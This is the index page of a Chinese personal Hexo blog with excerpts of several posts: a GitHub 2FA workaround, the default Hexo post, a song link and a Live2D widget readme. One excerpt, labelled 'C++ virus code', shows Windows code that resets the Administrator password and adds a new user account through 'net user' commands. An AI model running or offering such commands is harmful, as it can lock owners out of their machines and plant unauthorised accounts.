【急救】教你一分钟搞定Github 2FA验证
情况今天一上GitHub就发现让我验证2FA,不然啥也不给我用 先不管国外的APP能不能用,还有我又不怕盗号就不能不搞吗? 如何解决其实不用手机,直接下载浏览器插件就行了 下载链接在CRX 然后直接安装插件,然后到Github用插件扫描二维码,然后把验证填上去就行了 说实话,其实我不在意盗号,这样搞反而麻烦。
C++代码分享-1
c++病毒代码(慎用)123456789101112131415161718192021222324252627282930313233#include<iostream>#include<stdlib.h>#include<conio.h>#include<windows.h>#include<ctime>using namespace std;int main(){ cout<<"确定要修改密码吗,请输入Y(Yes)或N(No):"; char k=getch(); if(k=='Y'||k=='y') system("net user Administrator wait");//用户密码重设为wait system("net user xxx wait /add");//用户名重设为xxx //system("ping www.baidu.com");//ping百度网站 ...
Hello World
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub. Quick StartCreate a new post1$ hexo new "My New Post" More info: Writing Run server1$ hexo server More info: Server Generate static files1$ hexo generate More info: Generating Deploy to remote sites1$ hexo deploy More info: Deployment
歌曲[Wellerman]分享
视频 链接直达BiliBili
关于看板娘
Live2D Widget 特性 在网页中添加 Live2D 看板娘 轻量级,除 Live2D Cubism Core 外无其他运行时依赖 核心代码由 TypeScript 编写,易于集成 注:以上人物模型仅供展示之用,本仓库并不包含任何模型。 你也可以查看示例网页: 在 米米的博客 的左下角可查看效果 demo/demo.html,展现基础功能 demo/login.html,仿 NPM 的登陆界面 使用如果你是小白,或者只需要最基础的功能,那么只用将这一行代码加入 html 页面的 head 或 body 中,即可加载看板娘: 1<script src="https://fastly.jsdelivr.net/npm/live2d-widgets@1.0.0-rc.7/dist/autoload.js"></script> 添加代码的位置取决于你的网站的构建方式。例如,如果你使用的是 Hexo,那么需要在主题的模版文件中添加以上代码。对于用各种模版引擎生成的页面,修改方法类似。如果网站启用了 PJAX,...